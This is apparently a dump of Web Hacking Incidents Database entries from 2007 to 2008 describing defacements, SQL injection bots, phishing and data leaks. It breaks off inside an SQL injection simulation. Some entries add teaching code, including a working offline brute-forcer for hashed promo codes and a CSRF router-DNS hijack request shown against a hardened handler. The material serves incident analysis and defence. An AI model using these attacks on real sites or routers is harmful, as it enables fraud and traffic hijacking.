Entry Title: WHID 2008-27: U.K's Crime Reduction Portal Hosting Phishing Pages
WHID ID: 2008-27
Date Occured: 9/20/2008
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Phishing
Attacked Entity Field: Government
Attacked Entity Geography: UK
Incident Description:

Poste Italiane seems to have relocated to a brand new location online: in this case the U.K.'s Crime Reduction Portal, which is currently hosting a phishing page.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-26: Palin's private e-mail hacked, posted to Net
WHID ID: 2008-26
Date Occured: 9/20/2008
Attack Method: Brute Force
Application Weakness: Insufficient Password Recovery
Outcome: Leakage of Information
Attacked Entity Field: Politics
Attacked Entity Geography: USA
Incident Description:

The activist group called "anonymous," best known for its jousts with the Church of Scientology, has apparently hacked into the private Yahoo e-mail account of Alaska Gov. Sarah Palin, the Republican candidate for vice president.

Contents of that account, including two sample e-mails, an index of messages and Palin family photos, have been posted by the whistle blower site Wikileaks, which contends that they constitute evidence that Palin has improperly used her private e-mail to shield government business from public scrutiny, an issue that had already been raised by others.

Update (Oct 8)

David Kernell, a 20-year-old Tennessee college student, was indicted for the hack. The most interesting aspect of the hacker's identity is that his father, Mike Kernell, is a longtime Democratic state representative from Memphis.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-25: BusinessWeek website attacked and hosts malware
WHID ID: 2008-25
Date Occured: 9/20/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography: USA
Incident Description:

Another site hit by the SQL injection bot.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-24: SQL attacks lob onto ATP Web site
WHID ID: 2008-24
Date Occured: 7/21/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Sports
Attacked Entity Geography: Global
Incident Description:

Not a day goes by without yet another prominent web site being hacked by an SQL injection attack planting malware.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-23: Sony PlayStation
WHID ID: 2008-23
Date Occured: 7/21/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Yet another iframe injection in a very prominent web site, proving yet again that nobody is immune.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-22: Hacker changes news releases on sheriff's Web site
WHID ID: 2008-22
Date Occured: 7/21/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: USA
Incident Description:

A targeted defacement that modified two specific press releases to ridicule the local government.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-21: Information about organ and tissue donors open to all
WHID ID: 2008-21
Date Occured: 7/20/2008
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

Florida's Agency for Health Care Administration (AHCA) organ and tissue donor registry database was open to the public due to an unspecified software glitch. Personal details of 55,000 people, including name, address, date of birth, driver's license number and social security number, were exposed.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-20: XSS Worm At Justin.tv Affects 2525 Profiles
WHID ID: 2008-20
Date Occured: 7/16/2008
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description:

A proof-of-concept XSS worm crawled justin.tv, a popular lifecasting platform. The worm succeeded in planting self-replicating code on 2525 accounts in less than 24 hours before the vulnerability was fixed.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-19: OSU breach raises fears of ID theft
WHID ID: 2008-19
Date Occured: 5/19/2008
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

At Oklahoma State University (OSU) a security breach has exposed the names, addresses and Social Security numbers of 70,000 students, faculty and staff who bought parking and transit services permits in the past six years. The university failed to report the incident to the affected individuals for two months after it was detected.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-18: Winzipices SQL bot
WHID ID: 2008-18
Date Occured: 5/11/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Another member of the wave of SQL injection bots injecting malware-serving code into web sites.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-17: Hackers' posts on epilepsy forum cause migraines, seizures
WHID ID: 2008-17
Date Occured: 5/11/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Health
Attacked Entity Geography: USA
Incident Description:

Up to now we have never registered at WHID an incident that caused physical pain to its victims. Unfortunately, there is always a first. In an attack which gives a whole new dimension to the term "malicious", hackers recently injected into the Epilepsy Foundation's web site hundreds of pictures and links to pages with rapidly flashing images.

The breach caused severe migraines and near-seizure reactions in some site visitors who viewed the images. People with photosensitive epilepsy can get seizures when they're exposed to flickering images, a response also caused by some video games and cartoons.

The attack method is only described as an exploit of a security hole in the foundation's publishing software. However, the attack looks very much like a variation of the popular iframe-injecting SQL bots, used for malice rather than profit, hinting that this was an SQL injection attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-16: Turkish PM supporters hack hacker's Web site
WHID ID: 2008-16
Date Occured: 5/11/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: Turkey
Incident Description:

In a twist on the classic defacement incident, supporters of the Turkish PM defaced, in retaliation, the web site of the hackers who had just recently defaced the PM's web site. A disturbing question is whether this was juvenile mischief or an act planned and executed by PM supporters. Has political spin reached web site hacking?

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-15: ValueClick to Pay $2.9 Million to Settle FTC Charges
WHID ID: 2008-15
Date Occured: 3/24/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Marketing
Attacked Entity Geography: USA
Incident Description:

In this case SQL injection was not the root cause, but rather the justification. Just as Al Capone was eventually arrested for tax evasion, ValueClick, which seems to have infuriated the FTC with many commercial misdeeds, was eventually caught over SQL injection, presumably left open in violation of the company's own written security policy.

The FTC settlement cost ValueClick a record $2.9 million, plus 20 years of rigorous security procedures that will probably cost as much if not more. On top of that, eBay, a major partner, left ValueClick as a result.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-14: Hacker takes over Dallas police Web site
WHID ID: 2008-14
Date Occured: 2/21/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: USA
Incident Description:

Dallas police say the department shut down its Internet presence after a hacker took over its Web site and filled it with anti-American rants.

The vandalized Web pages included a doctored photograph showing American troops watching over four people lined up against a wall.

Each of the four prisoners had lines leading away from their faces to individual head shots of President George W. Bush, Vice President Dick Cheney, Secretary of State Condoleezza Rice and Sen. John McCain.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-13: Harvard site hacked and leaked on BitTorrent
WHID ID: 2008-13
Date Occured: 2/20/2008
Attack Method: Unknown
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: Joomla
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-12: Greek ministry websites hit by hacker intrusion
WHID ID: 2008-12
Date Occured: 2/17/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Greece
Incident Description:

This is yet another case of defacement of a governmental web site. It is remarkable that it is almost never the large commercial and financial web sites that get defaced; it is either small mom-and-pop shops or government and political web sites. Don't you get the feeling that government IT is run like a mom-and-pop shop? Do you wonder if it is only the IT part that is run that way?

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-11: Hacker breaks into Ecuador's presidential website
WHID ID: 2008-11
Date Occured: 2/12/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Ecuador
Incident Description:

Was it defaced or not? In this extraordinary incident, a hacker broke into the web site of the Ecuadorian president and said nice things about him. So nice, in fact, that the presidential office had to apologize to the opposition leader. Was it a hack or an over-enthusiastic marketing person?

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-10: Chinese hacker steals user information on 18 Million online shoppers at Auction.co.kr
WHID ID: 2008-10
Date Occured: 2/12/2008
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Entropy
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: Korea
Incident Description:

Update (January 5th 2009)

We were informed by sources at eBay, the Korean site's parent company, that the issue was not CSRF or session hijacking. The attack method was not disclosed.


A Korean e-commerce site was hacked and a staggering number of records, 18 million, were stolen. In the US this would be front-page news. We don't know if it was front-page news in Korea, but it did not reach the international media.

The original attack description was vague and, at the time, was best described as session hijacking.

This incident is a good example of the lack of sufficient international coverage at WHID. Help us by sending us non-English incidents! After all, it is not only English speakers who get hacked; it is just that we, the WHID maintainers, speak only this language.

More Information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-09: Hacking Stage 6
WHID ID: 2008-09
Date Occured: 2/10/2008
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description:

Sensitive information about people who created an account on the site leaked and was published through IRC.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-08: Hacker steals Davidson Cos. clients' data
WHID ID: 2008-08
Date Occured: 2/4/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description:

A computer hacker broke into the database of D.A. Davidson, a Montana financial services firm, and stole its entire customer database: 226,000 records including names and social security numbers. The attack method is not known, but it looks very much like a web hack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-07: Another Free MacWorld Platinum Pass? Yes in 2008!
WHID ID: 2008-07
Date Occured: 1/28/2008
Attack Method: Brute Force
Application Weakness: Application Misconfiguration
Outcome: Monetary Loss
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description:

Kurt already got his free MacWorld pass last year (WHID 2007-14), but it seems that nothing changes year after year and he was able to pull a similar trick this year. As the codes that allow customers to get the passes were hashed but stored in the client browser, Kurt was able to crack them.
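
The weakness above is worth seeing in code: a hash of a low-entropy code shipped to the browser is, in practice, the code itself. The following is an added example written for this entry, not code from the MacWorld site or from Kurt; the hash function (MD5), the code format (four upper-case letters) and the embedded hashes are all assumptions constructed to keep the run short.

```python
import hashlib
import itertools
import string

# Constructed stand-in for what a registration page might embed in its JavaScript
# so the browser can validate a priority code without asking the server. The real
# MacWorld page, its hash function and its code format are not known here; MD5
# over four upper-case letters is an assumption chosen to keep the demo fast.
ALPHABET = string.ascii_uppercase
CODE_LEN = 4


def client_side_hash(code):
    """The (assumed) hash the page ships and compares against in the browser."""
    return hashlib.md5(code.encode("ascii")).hexdigest()


# Hashes "scraped" from the page's JavaScript; constructed here from known codes.
EMBEDDED_HASHES = {client_side_hash("FREE"), client_side_hash("PASS")}


def keyspace(alphabet=ALPHABET, length=CODE_LEN):
    """Number of candidate codes the attacker has to try in the worst case."""
    return len(alphabet) ** length


def crack(hashes, alphabet=ALPHABET, length=CODE_LEN):
    """Offline brute force: hash every code of the given shape and return
    {hash: code} for each embedded hash that matches. No request ever reaches
    the server, so no rate limit, lockout or logging can slow this down."""
    remaining = set(hashes)
    found = {}
    for chars in itertools.product(alphabet, repeat=length):
        if not remaining:
            break
        code = "".join(chars)
        digest = hashlib.md5(code.encode("ascii")).hexdigest()
        if digest in remaining:
            found[digest] = code
            remaining.discard(digest)
    return found


if __name__ == "__main__":
    print("keyspace:", keyspace())
    for digest, code in crack(EMBEDDED_HASHES).items():
        print(digest, "->", code)
```

Under these assumptions the whole keyspace is under half a million hashes, which a laptop exhausts in well under a second; a longer alphabet or a slow hash only raises the cost linearly, and salting does nothing when the salt is in the same JavaScript. The only fix is to validate the code on the server and never send anything derived from it to the client.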

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-06: Hackers Take Down Pennsylvania Government
WHID ID: 2008-06
Date Occured: 1/28/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:


Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-05: Drive-by Pharming in the Wild
WHID ID: 2008-05
Date Occured: 1/28/2008
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Phishing
Attacked Entity Field: Finance
Attacked Entity Geography: Mexico
Incident Description:

Symantec reported an active exploit of CSRF against residential ADSL routers in Mexico (WHID 2008-05). An e-mail with a malicious IMG tag was sent to victims. By loading the image in the mail, the victim's browser issued a router command that changed the DNS entry for a leading Mexican bank, making any subsequent access by the user to the bank go through the attacker's server.
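
To make the mechanism concrete, here is an added example (not code from Symantec's report or from any router vendor) of a router admin handler in its CSRF-vulnerable form beside a hardened one, with the request an IMG tag produces replayed against both. The LAN address, the admin path, the `dns` and `csrf` parameter names, the session identifier and the IP addresses are all constructed assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

# Hypothetical router admin endpoint. The LAN address, path and parameter names
# are assumptions for illustration, not those of any real device.
ROUTER_ORIGIN = "http://192.168.1.1"
FACTORY_DNS = "192.168.1.1"


class Router:
    def __init__(self):
        self.dns = FACTORY_DNS
        self._secret = secrets.token_bytes(32)

    def csrf_token(self, session_id):
        """Token derived from the session. Only a page served by the router can
        read it; an <img> tag on another origin cannot."""
        return hmac.new(self._secret, session_id.encode(), hashlib.sha256).hexdigest()

    def handle_vulnerable(self, request):
        """Original behaviour: any request carrying the admin session (cookie,
        or cached basic-auth credentials the browser re-sends) with a dns
        parameter changes the setting. A GET from an <img src=...> qualifies."""
        if request["session"] is None:
            return 401
        query = parse_qs(urlparse(request["url"]).query)
        if "dns" not in query:
            return 400
        self.dns = query["dns"][0]
        return 200

    def handle_hardened(self, request):
        """State change requires: a session, POST (an image fetch is always a
        GET), an Origin/Referer on the router's own origin, and a CSRF token
        bound to the session in the POST body."""
        if request["session"] is None:
            return 401
        if request["method"] != "POST":
            return 405
        origin = request["headers"].get("Origin") or request["headers"].get("Referer", "")
        if not origin.startswith(ROUTER_ORIGIN):
            return 403
        body = parse_qs(request["body"])
        token = body.get("csrf", [""])[0].encode()
        expected = self.csrf_token(request["session"]).encode()
        if not hmac.compare_digest(token, expected):
            return 403
        if "dns" not in body:
            return 400
        self.dns = body["dns"][0]
        return 200


def img_tag_request(session_id):
    """What the victim's browser sends when the mail renders
    <img src="http://192.168.1.1/admin?dns=203.0.113.5">: a cross-site GET
    with the victim's router credentials attached and no Origin header."""
    return {"method": "GET", "url": ROUTER_ORIGIN + "/admin?dns=203.0.113.5",
            "headers": {}, "body": "", "session": session_id}


def admin_form_request(router, session_id):
    """A real change submitted from the router's own admin page."""
    return {"method": "POST", "url": ROUTER_ORIGIN + "/admin",
            "headers": {"Origin": ROUTER_ORIGIN},
            "body": "dns=198.51.100.53&csrf=" + router.csrf_token(session_id),
            "session": session_id}


def demo():
    """Replays the e-mail's image request against both handlers, then a
    legitimate change against the hardened one. Returns (dns after attack on
    the vulnerable router, hardened status, dns after attack on the hardened
    router, dns after the legitimate change)."""
    session_id = "sess-42"  # constructed: victim is logged in or auto-authenticated
    vuln = Router()
    vuln.handle_vulnerable(img_tag_request(session_id))
    hard = Router()
    status = hard.handle_hardened(img_tag_request(session_id))
    dns_after_attack = hard.dns
    hard.handle_hardened(admin_form_request(hard, session_id))
    return vuln.dns, status, dns_after_attack, hard.dns
```

The method check alone defeats an IMG tag, but not a hidden auto-submitting form on an attacker's page, which is why the session-bound token is the control that actually matters; the Origin check is defence in depth for browsers that send it. None of this helps when the router accepts the factory password from anyone on the LAN, which is the other half of why drive-by pharming worked.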

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: DSL Router
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-04: RIAA web site cleared
WHID ID: 2008-04
Date Occured: 1/22/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description:

The web site of the RIAA, the Recording Industry Association of America, was attacked twice using SQL injection over the weekend. First, a link carrying a query that takes a particularly long time to execute was posted on a social network site, causing a distributed denial of service against the site. Later, hackers found and abused additional SQL injection and XSS vulnerabilities, resulting in a major defacement of the site.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-02: Italian Bank's XSS Opportunity Seized by Fraudsters
WHID ID: 2008-02
Date Occured: 1/9/2008
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field: Finance
Attacked Entity Geography: Italy
Incident Description:

It has been a while since a phishing scam using XSS vulnerability found its way to the Web Hacking Incidents database (SunTrust, WHID 2004-11). The current incident is a good example of what does and does not get into our database: XSS vulnerabilities in public web sites are discovered daily and reported in sites such as XSSed, however most of these vulnerabilities are not included in WHID for lack of public interest. The current incident is different since the vulnerability is known to be exploited by attackers, moving it from the realm of technical interest to the realm of a real problem.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-01: Information stolen from geeks.com (Updated)
WHID ID: 2008-01
Date Occured: 1/8/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Update (Feb 8th 2009) - The company has reached a settlement with the FTC. Not a breathtaking achievement in the effort to make business care about web application security, yet a step in this direction. The report also identifies the attack as an SQL injection attack.



Very detailed records of geeks.com customers were stolen from the site. The records included name, address, telephone number, e-mail address, credit card number, expiration date, and most notoriously, card verification number (CVV).

The interesting part is that the site carried a Hacker Safe seal. The seal was revoked twice last year due to vulnerabilities, but restored after they were patched. It seems that this time either the hack preceded the scan or the scan missed the vulnerability. So much for application scanning and vulnerability assessment....

And don't take it lightly as a geeks site. Geeks.com is a $150M/year business.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-89: The big TJX hack
WHID ID: 2007-89
Date Occured: 12/29/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Update (January 12th 2009): A Ukrainian hacker who was a member of the TJX hack ring was sentenced to 30 years in jail by a Turkish court. According to the investigation papers, Maksym Yastremskiy made approximately 11 million dollars from the hack!


The TJX breach is one of the most publicized hacking incidents of recent years. However, until now it was not part of the Web Hacking Incidents Database, and for a good reason: early reports described the hack as a war-driving hack, in which the attackers drive around and find a wireless network that is not properly secured.

However, new information from the trial of the identity theft ring leader Albert Gonzalez reveals that in order to penetrate the TJX data center from the captured end points, the hackers employed different techniques including password sniffing and SQL injection. The latter justifies getting the TJX incident into WHID for the first time.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-88: Police Academy in India Hosting a Phishing Site
WHID ID: 2007-88
Date Occured: 9/20/2008
Attack Method: Unknown
Application Weakness:
Outcome:
Attacked Entity Field: Government
Attacked Entity Geography: India
Incident Description:

The SVP National Police Academy in Hyderabad, India has had some sort of compromise on their website resulting in a Bank of America phishing site operating on one of their servers.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-87: Hacker uses Insider information to gain on the stock exchange
WHID ID: 2007-87
Date Occured: 2/21/2008
Attack Method: Unknown
Application Weakness:
Outcome:
Attacked Entity Field: Health
Attacked Entity Geography:
Incident Description:

###

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-87: 7-Eleven Hack From Russia Led to ATM Looting in New York
WHID ID: 2007-87
Date Occured: September 2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: In his most-recent plea agreement, filed in court Monday, confessed hacker Albert Gonzalez admitted conspiring in the 7-Eleven breach and fingered two Russian associates as the direct culprits. The Russians are identified as “Hacker 1” and “Hacker 2” in Gonzalez’s plea agreement, and as “Grigg” and “Annex” in an earlier document inadvertently made public by his attorney. The Russians, evidently using an SQL injection vulnerability, “gained unauthorized access to 7-Eleven, Inc.’s servers through 7-Eleven’s public-facing internet site, and then leveraged that access into servers supporting ATM terminals located in 7-Eleven stores,” the plea agreement reads. “This access caused 7-Eleven, Inc., on or about November 9, 2007, to disable its public-facing internet site to disable the unauthorized access.”
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.wired.com/threatlevel/2009/12/seven-eleven/
Attack Source Geography: Russia
Attacked System Technology:
Cost: $2000000
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-86: Mac Blogs defaced using XSS
WHID ID: 2007-86
Date Occured: 2/17/2008
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography: Global
Incident Description:

The standard disclaimer that we do not cover each and every defacement applies to this entry as well. So why do we include this defacement incident? First and foremost, it is known to be an XSS attack abusing a WordPress zero-day bug. Secondly, it is a targeted attack aiming to deface only Mac-related web sites. Usually targeted defacement attacks are carried out against political targets. Did attacking Apple become a political issue? Was Apple transformed into a nation overnight? Well, certainly into a cult.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-85: IndiaTimes.com Visitors Risk High Exposure To Malware
WHID ID: 2007-85
Date Occured: 2/17/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Media
Attacked Entity Geography: India
Incident Description:

The web site of a leading Indian newspaper is swamped with malware. A recent Websense survey cited by The Register found that of the sites hosting malware, 51% were legitimate sites that had been broken into. This is a major shift in the threat landscape, since sticking to web sites you know is no longer a good protection strategy. Anecdotally, it also undermines Websense's own web site classification technology as a security solution.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-84: Soccer league's online shoppers get kicked by security breach
WHID ID: 2007-84
Date Occured: 2/10/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Sports
Attacked Entity Geography: USA
Incident Description:

It is already February, and we are still adding 2007 incidents. If you wonder why, it is because organizations such as MLS only now find out that they were hacked last year! Sometime between January and August of 2007, names, addresses, credit and debit card data, and passwords of an unknown number of people, including 169 New Hampshire residents, were stolen from the site.

Why New Hampshire? Because the company has to report the incident to the authorities there, but only has to specify the number of individuals from that state who were affected. Why only New Hampshire? Since regulations and bills requiring disclosure exist in many states, one would expect the company to have to provide such a disclosure in many states. This incident is another good example of the size of the hidden part of the iceberg.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-83: More Social Security numbers leaked at Montana State University
WHID ID: 2007-83
Date Occured: 1/28/2008
Attack Method: Administration Error
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

Again a Microsoft Excel file was left on a University's web site for anyone to view.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-82: An SQL injection Mass Robot
WHID ID: 2007-82
Date Occured: 1/8/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An SQL injection robot is running wild and has already hacked hundreds of thousands of web sites. Since the robot plants malicious code in infected sites, its traces can be found by Googling for the names of the Chinese sites referenced in the malicious code.

As a security practitioner I often see SQL injection bots, many times when I install ModSecurity, an open source web application firewall, but this bot is unique in the way it exploits web sites. It is easier to perform a wide-scale attack by exploiting the least common denominator, which in the hacking world is the operating system. As a result most SQL bots tend to use SQL injection vectors that enable issuing OS commands. A good example is a Cacti vulnerability: since it allows an OS command to be issued, I often see bots looking for it in the wild. This attack is the first I have seen in which the actual attack vector is SQL based. The bot modifies every record it has access to into malicious code in the hope that it will be fetched and displayed by the application to its users.

A byproduct of this vector is that the results are catastrophic for the site owners. While in common defacement attacks restoring (or recreating) the homepage is all that is required to get back to business, in this case the whole database is ruined. Considering the scope of the attack, and that restoring the database, if it was ever backed up, requires much more expertise, the overall damage of this attack is very high.
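
The "modify every record" vector and its cleanup cost are easier to grasp with a small simulation. The following is an added example for this entry, not the bot's payload and not code from ModSecurity or from any hacked site: it builds a constructed sqlite database, runs a stacked-statement injection through a concatenated query, counts the damage, shows that a parameterised query is immune, and sweeps the injected tag out of every text column. The real bots enumerated columns inside the injected T-SQL (a cursor over the MSSQL catalog); here that enumeration is done in Python against sqlite's catalog so the payload stays readable, and the script host in `INJECTED` is a constructed placeholder.

```python
import sqlite3

# Constructed sample schema for a small content site.
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
INSERT INTO news VALUES (1, 'Welcome', 'Hello world');
INSERT INTO news VALUES (2, 'Roadmap', 'Second post');
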